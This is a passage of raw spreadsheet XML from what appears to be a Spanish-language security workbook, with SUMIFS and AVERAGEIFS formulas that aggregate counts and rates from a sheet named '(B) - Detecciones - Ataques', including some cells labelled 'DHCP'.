      <c r="CR42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>1</v>
      </c>
      <c r="DF42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ42" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK42" s="271"/>
      <c r="DO42" s="428"/>
      <c r="DP42" s="429"/>
      <c r="DQ42" s="429"/>
      <c r="DR42" s="429"/>
      <c r="DS42" s="429"/>
      <c r="DT42" s="429"/>
      <c r="DU42" s="430" t="s">
        <v>2413</v>
      </c>
      <c r="DV42" s="271"/>
      <c r="DW42" s="429"/>
      <c r="DX42" s="429"/>
      <c r="DY42" s="429"/>
      <c r="DZ42" s="429"/>
      <c r="EA42" s="429"/>
      <c r="EB42" s="430" t="s">
        <v>2413</v>
      </c>
      <c r="EC42" s="271"/>
      <c r="ED42" s="280"/>
      <c r="EG42" s="279"/>
      <c r="EH42" s="271"/>
      <c r="EI42" s="271"/>
      <c r="EJ42" s="271"/>
      <c r="EK42" s="271"/>
      <c r="EL42" s="271"/>
      <c r="EM42" s="271"/>
      <c r="EN42" s="430" t="s">
        <v>2413</v>
      </c>
      <c r="EO42" s="431"/>
      <c r="EP42" s="431"/>
      <c r="EQ42" s="431"/>
      <c r="ER42" s="271"/>
      <c r="ES42" s="271"/>
      <c r="ET42" s="271"/>
      <c r="EU42" s="271"/>
      <c r="EV42" s="271"/>
      <c r="EW42" s="432"/>
      <c r="EX42" s="432"/>
      <c r="EY42" s="432"/>
      <c r="EZ42" s="432"/>
      <c r="FA42" s="367"/>
      <c r="FC42" s="334" t="s">
        <v>2462</v>
      </c>
      <c r="FD42" s="335" t="s">
        <v>2478</v>
      </c>
      <c r="FE42" s="368">
        <f>AVERAGE(ET49:ET62)</f>
        <v>0.8641203704</v>
      </c>
      <c r="FF42" s="368">
        <f>AVERAGE(ES49:ES62)</f>
        <v>0.7219836202</v>
      </c>
      <c r="FG42" s="368">
        <f>AVERAGE(ER49:ER62)</f>
        <v>0.7210951086</v>
      </c>
      <c r="FH42" s="369">
        <f>AVERAGE(EQ49:EQ62)</f>
        <v>0.8406849251</v>
      </c>
      <c r="FK42" s="433" t="s">
        <v>2493</v>
      </c>
      <c r="FL42" s="427">
        <f t="shared" ref="FL42:FO42" si="27">1-FL41</f>
        <v>0</v>
      </c>
      <c r="FM42" s="427">
        <f t="shared" si="27"/>
        <v>0.0652173913</v>
      </c>
      <c r="FN42" s="427">
        <f t="shared" si="27"/>
        <v>0.08445945946</v>
      </c>
      <c r="FO42" s="427">
        <f t="shared" si="27"/>
        <v>0.372519084</v>
      </c>
      <c r="FP42" s="392"/>
      <c r="FQ42" s="392"/>
      <c r="FR42" s="392"/>
      <c r="FS42" s="392"/>
      <c r="FT42" s="392"/>
      <c r="FU42" s="392"/>
      <c r="FV42" s="392"/>
      <c r="FW42" s="392"/>
      <c r="FX42" s="392"/>
      <c r="FY42" s="392"/>
      <c r="FZ42" s="392"/>
      <c r="GA42" s="392"/>
      <c r="GB42" s="392"/>
      <c r="GC42" s="392"/>
      <c r="GD42" s="392"/>
      <c r="GE42" s="392"/>
      <c r="GF42" s="392"/>
      <c r="GG42" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="GH42" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GI42" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GJ42" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GK42" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="GL42" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GM42" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GN42" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0.5</v>
      </c>
      <c r="GO42" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="GP42" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GQ42" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GR42" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GS42" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="GT42" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GU42" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GV42" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG42)</f>
        <v>0</v>
      </c>
      <c r="GW42" s="392"/>
      <c r="GX42" s="392"/>
      <c r="GY42" s="392"/>
      <c r="GZ42" s="392"/>
      <c r="HA42" s="392"/>
      <c r="HB42" s="392"/>
      <c r="HC42" s="392"/>
      <c r="HD42" s="392"/>
      <c r="HE42" s="392"/>
      <c r="HF42" s="392"/>
      <c r="HG42" s="392"/>
      <c r="HH42" s="392"/>
      <c r="HI42" s="392"/>
      <c r="HJ42" s="392"/>
      <c r="HK42" s="392"/>
      <c r="HL42" s="392"/>
      <c r="HM42" s="392"/>
      <c r="HN42" s="392"/>
      <c r="HO42" s="392"/>
      <c r="HP42" s="392"/>
    </row>
    <row r="43">
      <c r="B43" s="277"/>
      <c r="C43" s="271"/>
      <c r="D43" s="271"/>
      <c r="E43" s="271"/>
      <c r="F43" s="271"/>
      <c r="G43" s="278"/>
      <c r="J43" s="277"/>
      <c r="K43" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BI3:BI139)</f>
        <v>1435</v>
      </c>
      <c r="L43" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CW3:CW139)</f>
        <v>21340</v>
      </c>
      <c r="M43" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EM3:EM139)</f>
        <v>40499</v>
      </c>
      <c r="N43" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GC3:GC139)</f>
        <v>169287</v>
      </c>
      <c r="O43" s="278"/>
      <c r="Q43" s="271"/>
      <c r="R43" s="386" t="s">
        <v>2486</v>
      </c>
      <c r="S43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="T43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>108</v>
      </c>
      <c r="V43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="W43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>579</v>
      </c>
      <c r="AA43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>141</v>
      </c>
      <c r="AB43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="AC43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AD43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE43" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="AF43" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG43" s="271"/>
      <c r="AH43" s="386" t="s">
        <v>2486</v>
      </c>
      <c r="AI43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>22</v>
      </c>
      <c r="AJ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>2</v>
      </c>
      <c r="AL43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>9</v>
      </c>
      <c r="AY43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>10</v>
      </c>
      <c r="BO43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP43" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FY3:$FY139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ43" s="355">
